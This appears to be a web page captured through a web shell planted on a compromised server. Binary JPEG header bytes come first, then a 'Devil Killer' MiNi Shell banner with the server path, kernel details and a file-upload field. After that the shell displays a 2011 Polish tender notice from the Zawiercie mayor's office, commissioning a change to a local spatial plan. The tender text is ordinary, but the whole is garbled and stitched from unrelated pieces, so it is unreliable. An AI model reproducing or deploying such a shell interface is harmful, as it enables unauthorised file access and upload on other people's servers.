JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111129/311637-N-2011.html

<p class="kh_header"><b>Zawiercie: Sporządzenie projektu zmiany miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej , z otoczeniem, uchwalonego uchwałą Rady Miejskiej w Zawierciu  nr XLIX/634/10 , z dnia 31 marca 2010 r.</b><br>
<b>Numer ogłoszenia: 311637 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie projektu zmiany miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej , z otoczeniem, uchwalonego uchwałą Rady Miejskiej w Zawierciu  nr XLIX/634/10 , z dnia 31 marca 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sporządzenie projektu zmiany miejscowego planu zagospodarowania przestrzennego miasta Zawiercie dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - obszar A, położony w rejonie ulic : Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej , z otoczeniem, uchwalonego uchwałą Rady Miejskiej w Zawierciu  nr XLIX/634/10, z dnia 31 marca 2010 r. , w granicach terenów określonych w § 1 uchwały nr XIV/111/11 Rady Miejskiej w Zawierciu z dnia 31 sierpnia 2011 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego miasta Zawiercia dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - Obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej, z otoczeniem, uchwalonego  uchwałą Rady Miejskiej w Zawierciu nr XLIX/634/10 z dnia 31 marca 2010 r. (Dz. Urz. Woj. Śląskiego z 2010 r. Nr 84, poz. 1398), z zachowaniem celów i kierunków rozwoju przestrzennego Gminy Zawiercie, określonych w uchwalonym uchwałą Nr XVIII/172/2000 Rady Miejskiej w Zawierciu z dnia 21 marca 2000r. Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia, zmienionym uchwałą nr VIII/74/07 z dnia 25 kwietnia 2007r.
Przedmiot zamówienia powinien być wykonany zgodnie z przepisami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) i aktów wykonawczych do tej ustawy, w tym rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164, poz. 1587), a także zgodnie z przepisami odrębnymi odnoszącymi się do planowania i zagospodarowania przestrzennego. 
Przedmiot zamówienia obejmuje także sporządzenie opracowania ekofizjograficznego zgodnie z przepisami rozporządzenia Ministra Środowiska z dnia 9 września 2002 r.    w sprawie opracowań ekofizjograficznych (Dz. U. z 2002 r. Nr 155, poz. 1298), prognozy oddziaływania na środowisko oraz przeprowadzenie strategicznej oceny oddziaływania na środowisko dla ww. zmiany planu, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. z 2008 r. Nr 199, poz. 1227 z późn. zm.)
Opracowanie projektu zmiany miejscowego planu winno być poprzedzone wariantowymi koncepcjami terenu objętego opracowaniem, które podlegać będą akceptacji Zamawiającego. Przedmiot zamówienia obejmuje udział w czynnościach związanych ze sporządzeniem projektu zmiany miejscowego planu: przygotowanie wzorów dokumentów formalno-prawnych związanych ze sporządzaniem projektu zmiany planu, dyżury projektanta podczas wyłożenia projektu do publicznego wglądu (1 raz w tygodniu), udział w dyskusji publicznej, udział w spotkaniach merytorycznych w siedzibie Zamawiającego dot. przedmiotu wykonywanych prac, udział w posiedzeniach Komisji Rady Miejskiej oraz w posiedzeniach Gminnej Komisji Urbanistyczno-Architektonicznej dot. przedmiotu zamówienia, w terminach wyznaczonych przez Zamawiającego, wprowadzenie w projekcie zmiany planu zmian wynikających z uzgodnień i rozpatrzonych uwag złożonych do wyłożonego do publicznego wglądu projektu zmiany planu, uczestniczenie w sesji Rady Miejskiej, podczas której podejmowana będzie uchwała w sprawie zmiany miejscowego planu.
Wymagane jest opracowanie przedmiotu zamówienia etapami - zgodnie z harmonogramem prac projektowych, stanowiącym załącznik do umowy. Każdy etap opracowania będący przedmiotem odbioru powinien zostać przedłożony Zamawiającemu w wersji papierowej (2 egzemplarze) i elektronicznej na płycie CD/DVD. Przy składaniu częściowych protokołów przekazania prac, Wykonawca zobowiązany jest każdorazowo do wyszczególnia w protokole, jakie prace są przedmiotem przekazania (zgodnie z harmonogramem).
Powierzchnia opracowania:	około 1,1854 ha
Skala opracowania:	1 : 1000
Specyfika terenu objętego opracowaniem: 
Obszar będący przedmiotem opracowania zmiany miejscowego planu obejmuje działki nr ew. 195/1, 193/1, 194/2, 194/1, 196/1 (k.m. 11 obręb Zawiercie) położone przy ul. Rolniczej oraz działki nr ew. 707/1, 706/5, 706/6 (k.m.4 obręb Marciszów) położone przy ul. Myśliwskiej o łącznej powierzchni 1,1854 ha, dla których w obowiązującym studium przyjęto kierunki rozwoju: tereny zabudowy mieszkaniowej jednorodzinnej, tereny zabudowy mieszkaniowej jednorodzinnej i usługowej z dominującą zabudową usługową, tereny zabudowy usługowej.
Zakres opracowania przedmiotu zamówienia:
- pozyskanie z gminnego zasobu geodezyjnego i kartograficznego kopii map zasadniczych (w skali 1 : 1000), o których mowa w § 5 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164, poz. 1587), niezbędnych do opracowania przedmiotu zamówienia oraz kopii map ewidencyjnych, na koszt Wykonawcy,
- wykonanie inwentaryzacji urbanistycznej i oceny istniejącego stanu zagospodarowania przestrzennego - opracowanie syntezy w formie opisowej            i graficznej,
- sporządzenie opracowania ekofizjograficznego, o którym mowa w art. 72 ust. 4 i 5 obowiązującej ustawy z dnia 27 kwietnia 2001r. - Prawo ochrony środowiska (Dz.U. z 2006r. Nr 129, poz. 902 z późniejszymi zmianami), zgodnie z przepisami rozporządzenia Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz.U. z 2002 r. Nr 155, poz. 1298),
- przygotowanie wstępnej koncepcji przeznaczenia terenów oraz określenie sposobów ich zagospodarowania i zabudowy na obszarze opracowania, zgodnie z uchwałą nr XIV/111/11 Rady Miejskiej w Zawierciu z dnia 31 sierpnia 2011 r. i przedstawienie opracowanych materiałów do akceptacji Zamawiającemu, 
- sporządzenie projektu zmiany planu z uwzględnieniem uwag Zamawiającego, zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia         2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z 2003 r. Nr 164, poz. 1587),
- sporządzenie prognozy oddziaływania na środowisko ustaleń zmiany planu, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 z późn. zm.), poprzedzone uzgodnieniem, z właściwymi organami, zakresu i stopnia szczegółowości informacji w niej zawartych, zgodnie z wymogami cytowanej ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko,
- sporządzenie prognozy skutków finansowych uchwalenia zmiany planu miejscowego z uwzględnieniem art. 36 wyżej cytowanej ustawy o planowaniu i zagospodarowaniu przestrzennym, zgodnie z § 11 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
- skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego,
- Wykonawca zobowiązany jest do: udziału w spotkaniach roboczych i posiedzeniach komisji Rady Miejskiej dotyczących projektu zmiany planu, prezentacji projektu zmiany planu Gminnej Komisji Urbanistyczno-Architektonicznej, Komisji Polityki Przestrzennej i Ochrony Środowiska Rady Miejskiej w Zawierciu, podczas publicznej dyskusji na temat przyjętych w projekcie zmiany planu rozwiązań oraz podczas sesji Rady Miejskiej, w terminach wskazanych przez Zamawiającego,
- Wykonawca zobowiązany jest do udzielania Zamawiającemu pisemnych wyjaśnień dotyczących przyjętych w projekcie zmiany planu rozwiązań, a w szczególności pisemnego uzasadnienia powodu nieuwzględnienia uwag przekazywanych przez Zamawiającego do sporządzanego projektu zmiany planu,
- w przypadku stwierdzenia przez organ nadzorczy lub Sąd nieważności uchwały - Wykonawca zobowiązany jest do wykonania czynności związanych z usunięciem wad opracowania i doprowadzeniem uchwały do zgodności z przepisami prawnymi, bez dodatkowego wynagrodzenia.
W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do uczestnictwa w przeprowadzeniu pełnej procedury dotyczącej uchwalenia zmiany planu, wynikającej z ustawy o planowaniu i zagospodarowaniu przestrzennym wraz z przeprowadzeniem strategicznej oceny oddziaływania na środowisko dla zmiany planu, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 z późn. zm.) oraz do opracowania wszelkich dokumentów wynikających z procedur związanych ze sporządzeniem zmiany planu, w tym:
- sporządzenie opracowania ekofizjograficznego, które powinno zawierać część opisową oraz kartograficzną zgodnie z problematyką określoną w rozporządzeniu Ministra Środowiska z dnia 9 września 2002r. w sprawie opracowań ekofizjograficznych (Dz. U. z 2002 r. Nr 155, poz. 1298),
- wykonanie analizy wniosków do zmiany planu i opracowanie propozycji ich rozpatrzenia,
- opracowanie koncepcji projektu zmiany planu, uwzględniającej oczekiwania gminy i jej prezentacja władzom gminy,
- opracowanie projektu zmiany planu z uwzględnieniem uwag Zamawiającego, złożonych do koncepcji,
- opracowanie prognozy skutków finansowych uchwalenia zmiany planu,
- przeprowadzenia strategicznej oceny oddziaływania na środowisko,
- opracowanie prognozy oddziaływania na środowisko, po uzgodnieniu z właściwymi organami stopnia szczegółowości informacji w niej zawartych, zgodnie z wymogami ustawy z dnia 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 z późn. zm.),
- przedstawienie projektu zmiany planu wraz z całą dokumentacją do zaopiniowania Gminnej Komisji Urbanistyczno-Architektonicznej (dalszej procedurze poddawany będzie projekt zmiany planu pozytywnie zaopiniowany przez GKU-A),
- przygotowanie projektu wystąpienia o zaopiniowanie projektu zmiany planu wraz z rozdzielnikiem oraz kopiami projektu zmiany planu i prognozy oddziaływania na środowisko,
- przygotowanie projektu wystąpienia o uzgodnienia wraz z rozdzielnikiem oraz kopiami projektu zmiany planu i prognozy oddziaływania na środowisko,
- opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach,
- wprowadzenie zmian do projektu zmiany planu wynikających z uwzględnionych uwag zawartych w opiniach i zmian wynikających z dokonanych uzgodnień, w sposób ustalony z władzami gminy,
- opracowanie zmiany prognozy oddziaływania na środowisko, w związku ze zmianami w projekcie zmiany planu,
- opracowanie zmiany prognozy skutków finansowych uchwalenia zmiany planu, w związku ze zmianami w projekcie zmiany planu,
- opracowanie projektów ogłoszenia prasowego i obwieszczenia o wyłożeniu projektu zmiany planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu,
- obsługa wyłożenia projektu zmiany planu (jeden raz w tygodniu),
- zorganizowanie oraz udział w dyskusji publicznej nad przyjętymi w projekcie zmiany planu rozwiązaniami i sporządzenie protokołu z tej dyskusji,
- sporządzenie wykazu uwag wniesionych do wyłożonego do publicznego wglądu projektu zmiany planu i prognozy oddziaływania na środowisko, analiza tych uwag  i opracowanie propozycji ich rozpatrzenia,
- udział w spotkaniach roboczych i posiedzeniach komisji Rady Miejskiej dotyczących rozpatrzenia uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu zmiany planu i prognozy oddziaływania na środowisko, w terminach wyznaczonych przez Zamawiającego,
- wprowadzenie zmian do projektu zmiany planu wynikających z rozpatrzenia uwag wniesionych po wyłożeniu projektu zmiany planu do publicznego wglądu,
- przedstawienie Radzie Miejskiej projektu zmiany planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu projektu zmiany planu do publicznego wglądu,
- ponowne przeprowadzenie czynności określonych w art. 17 ustawy o planowaniu i zagospodarowaniu przestrzennym, jeżeli Zamawiający stwierdzi konieczność dokonania zmian, w zakresie niezbędnym do dokonania tych zmian (przygotowanie projektu wystąpienia o ponowne zaopiniowanie i o ponowne uzgodnienia wraz z rozdzielnikiem oraz kopiami projektu zmiany planu i prognozy oddziaływania na środowisko, opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, wprowadzenie zmian do projektu zmiany planu, odpowiednio do uwzględnionych uwag zawartych w uzasadnionych prawnie stanowiskach podmiotów uzgadniających, w sposób ustalony z władzami gminy, wyłożenie projektu zmiany planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu, przeprowadzenie dyskusji publicznej itd.) i ponowne przedstawienie Radzie Miejskiej projektu zmiany planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu zmiany planu do publicznego wglądu,
- przygotowanie potrzebnej ilości materiałów roboczych - odpowiedniej m.in. do uzgodnień, opinii, konsultacji,
- przygotowanie projektu oświadczenia o zgodności projektu zmiany planu z ustaleniami studium,
- przygotowanie projektu rozstrzygnięcia o sposobie realizacji zapisanych w zmianie planu inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy oraz zasadach ich finansowania,
- przygotowanie uzasadnienia i podsumowania, o których mowa w art. 43 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. z 2008 r. Nr 199, poz. 1227 z późn. zm.),
- skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego - 2 kpl.,
- przygotowanie projektu wystąpienia do Wojewody w sprawie oceny zgodności z przepisami prawnymi uchwały Rady Miejskiej wraz z załącznikami.
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu przedmiot zamówienia w tradycyjnej formie papierowej w następującej liczbie egzemplarzy:
a)tekst zmiany planu - 8 oprawionych egzemplarzy,  
b)rysunek planu - 10 egzemplarzy z naniesionymi granicami ewidencyjnymi działek, w tym 5 egzemplarzy dwustronnie zalaminowanych,
c)kopie rysunku planu według wymogów urzędu wydającego dziennik urzędowy województwa - 6 kpl,
d)prognoza skutków finansowych - 4 oprawione egzemplarze,
e)opracowanie ekofizjograficzne - 2 oprawione egzemplarze,
f)prognoza oddziaływania na środowisko - 4 oprawione egzemplarze.
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu przedmiot umowy w formie elektronicznej w formacie ustalonym z Zamawiającym - 5 płyt CD,DVD (nośnik elektroniczny do odczytu i wydruku) w następującym zakresie: 
a)tekst zmiany planu - w MS Word,
b)rysunek zmiany planu - format plików: JPG, DWG, PDF, TIFF z zachowaniem skali opracowania 1 : 1000,
c)prognoza skutków finansowych - w MS Word, JPG,
d)opracowanie ekofizjograficzne - w MS Word, JPG,
e)prognoza oddziaływania na środowisko - w MS Word, JPG.
Wykonawca zobowiązany jest wykonać i przekazać Zamawiającemu 2 komplety dokumentacji prac planistycznych prowadzonych na potrzeby przedmiotu umowy,    na podstawie oryginalnych dokumentów przekazanych przez Zamawiającego:
a)egzemplarz dla Wojewody (oryginał),
b)egzemplarz dla Urzędu Miejskiego w Zawierciu (kopia).
Zamawiający udostępni Wykonawcy:
- Uchwałę nr XIV/111/11 z dnia 31 sierpnia 2011 r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego miasta Zawiercia dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - Obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej, z otoczeniem, uchwalonego uchwałą Rady Miejskiej w Zawierciu Nr XLIX/634/10 z dnia 31 marca 2010 r. (uchwała dostępna na stronie internetowej www.zawiercie.eu - Biuletyn Informacji Publicznych Urzędu Miejskiego w Zawierciu - uchwały),
- Uchwałę nr XLIX/634/10 z dnia 31 marca 2010 r. w sprawie miejscowego planu zagospodarowania przestrzennego miasta Zawiercia dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - Obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej, z otoczeniem              (Dz. Urz. Woj. Śląskiego z 2010 r. Nr 84, poz. 1398) - w wersji elektronicznej,
- Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta Zawiercia uchwalone uchwałą nr XVIII/172/2000 Rady Miejskiej w Zawierciu z dnia 21 marca 2000r. zmienione uchwałą nr VIII/74/07 z dnia 25 kwietnia 2007r. (dostępne na stronie internetowej www.zawiercie.eu, zakładka - gospodarka, plany zagospodarowania przestrzennego) - w wersji elektronicznej,
- Opracowanie ekofizjograficzne wykonane dla miejscowego planu zagospodarowania przestrzennego miasta Zawiercia dla obszarów obejmujących Strefę Aktywności Gospodarczej w Zawierciu - Obszar A, położony w rejonie ulic: Wojska Polskiego, Myśliwskiej i projektowanej drogi głównej, z otoczeniem.
Inne materiały znajdujące się w posiadaniu Zamawiającego, a mogące służyć do opracowania przedmiotu zamówienia, Zamawiający udostępni na pisemny wniosek Wykonawcy.
Wszelkie inne materiały niezbędne do wykonania przedmiotu zamówienia, w tym kopie map, o których mowa § 5 rozporządzeniu Ministra Infrastruktury z dnia z dnia          26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U. z 2003r. Nr 164, poz. 1587), Wykonawca przygotuje i pozyska we własnym zakresie i na własny koszt (a ich koszt skalkuluje  w cenie ofertowej).  
Warunki płatności:
- I etap fakturowania: po przygotowaniu projektu zmiany planu wraz z prognozą oddziaływania na środowisko do publicznego wglądu (zrealizowanie III etapu prac zgodnie z harmonogramem) - 50% wartości zamówienia.
- II etap fakturowania: po pozytywnej ocenie zgodności z przepisami prawnymi przez Wojewodę uchwały, o której mowa w ust. 5 wraz załącznikami oraz dokumentacji prac planistycznych i przekazaniu zmiany planu do publikacji - 50% wartości zamówienia.
- Niedotrzymanie terminów wykonania prac w poszczególnych etapach określonych w załączonym do umowy harmonogramie, powoduje płatność jednoetapową, po zrealizowaniu przedmiotu zamówienia - po pozytywnej ocenie zgodności z przepisami prawnymi przez Wojewodę uchwały, o której mowa w ust. 5 wraz załącznikami oraz dokumentacji prac planistycznych.
- Niedotrzymanie terminu wykonania przedmiotu zamówienia powoduje kary umowne.
Określony w specyfikacji termin wykonania przedmiotu zamówienia, to nieprzekraczalny termin pozytywnej oceny zgodności z przepisami prawnymi przez Wojewodę uchwały Rady Gminy w sprawie uchwalenia zmiany planu wraz załącznikami oraz dokumentacji prac planistycznych i przekazania uchwały do publikacji.
Zamawiający zastrzega, iż w przypadku negatywnej oceny przez Wojewodę zgodności z przepisami prawnymi uchwały (wraz z załącznikami) Rady Gminy w sprawie uchwalenia zmiany planu, oraz dokumentacji prac planistycznych, na Wykonawcy ciąży obowiązek usunięcia wszelkich wad pod rygorem konsekwencji niewykonania przedmiotu zamówienia w terminie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy - w zakresie niniejszego warunku udziału w postępowaniu o udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego (lub zmiany planu) w procedurach określonych w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym o wartości z podatkiem VAT nie mniejszej niż 20 000 zł brutto (słownie złotych: dwadzieścia tysięcy) każdy; W celu potwierdzenia spełniania warunku Wykonawca składa : Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzonego wg wzoru stanowiącego załącznik nr 1 do SIWZ, oraz Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie usług określonych powyżej z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie (np. referencje) Wzór wykazu znajduje się w załączniku nr 3 do SWIZ,  Zamawiający wymaga, aby wykonawca wykazał nie później niż na dzień składania ofert spełnianie warunku o którym mowa powyżej. Ocena spełniania przedstawionego 